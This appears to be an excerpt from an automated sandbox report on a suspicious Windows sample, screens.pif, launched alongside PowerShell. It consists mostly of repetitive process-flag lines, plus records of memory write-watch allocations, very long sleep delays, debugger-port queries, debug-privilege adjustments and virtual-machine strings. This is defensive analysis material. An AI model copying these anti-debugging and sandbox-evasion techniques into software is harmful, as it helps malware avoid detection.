                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess information set: NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 5490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 6490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 65C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 75C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 7950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 9950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: ABD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: BBD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: C060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: D070000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 5490000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 65C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 7950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 8950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\screens.pifMemory allocated: 9950000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\screens.pifThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4443Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5362Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\screens.pif TID: 6328Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\screens.pif TID: 748Thread sleep time: -1380000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\screens.pifThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\screens.pifThread delayed: delay time: 60000Jump to behavior
                Source: powershell.exe, 00000000.00000002.1542511922.000002783CF77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWWi%SystemRoot%\system32\mswsock.dll\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows6
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                Source: powershell.exe, 00000000.00000002.1487508963.0000027824EFA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                Source: powershell.exe, 00000000.00000002.1487508963.00000278268D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                Source: screens.pif, 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]5_2_0040317B
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,5_2_00402B7C
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\screens.pifProcess token adjusted: DebugJump to behavior
